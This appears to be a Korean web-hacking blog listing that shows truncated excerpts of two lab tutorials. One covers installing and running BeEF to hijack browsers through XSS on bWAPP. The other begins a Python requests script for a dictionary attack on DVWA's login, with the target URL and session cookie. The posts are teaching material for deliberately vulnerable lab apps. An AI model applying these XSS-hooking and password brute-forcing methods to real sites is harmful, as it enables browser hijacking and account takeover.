웹해킹

경고 : 반드시 실습 환경에서 진행하시고, 상용 망에 실행하여 처벌 받을 시 작성자와 무관함을 알립니다. 실습 환경: kali linux 2023 버전, bwapp 오늘은 BeEF 프레임워크를 활용한 XSS 공격을 실습해 볼 것 입니다. 1. beEF 설치 sudo apt-get install beef-xss 이후 beef-xss 명령어로 실행이 가능합니다. 제일 처음에 beef-xss를 실행하면 비밀번호를 입력하라고 나옵니다. 아무 비밀번호나 설정해도 상관없습니다. http://127.0.0.1:3000/ui/panel로 이동하면 이런 화면이 나옵니다. username은 beef password는 아까 설정한 걸로 입력하면 됩니다. 2. 스크립트 삽입 IP는 자기 아이피로 하고 스크립트를 삽입합니다. ..

오늘은 Dictionary Attack을 실습해 볼 것입니다 아무렇게나 입력하고 로그인 버튼을 눌러보면 이름, 비밀번호가 맞지 않다고 나옵니다. 버프스위트로 해당 패킷을 잡아보면 이렇게 나옵니다. 저는 파이썬 requests 모듈을 활용하여 실습을 해볼 겁니다. main.py import requests from fake_useragent import UserAgent def Attack(): URL = "http://10.211.55.7/DVWA/vulnerabilities/brute/" cookies = { "PHPSESSID" : "er8uv6cfg8ks2dua60gnof174q", "security" : "low" } params = { 'username' : '', 'password' : '',..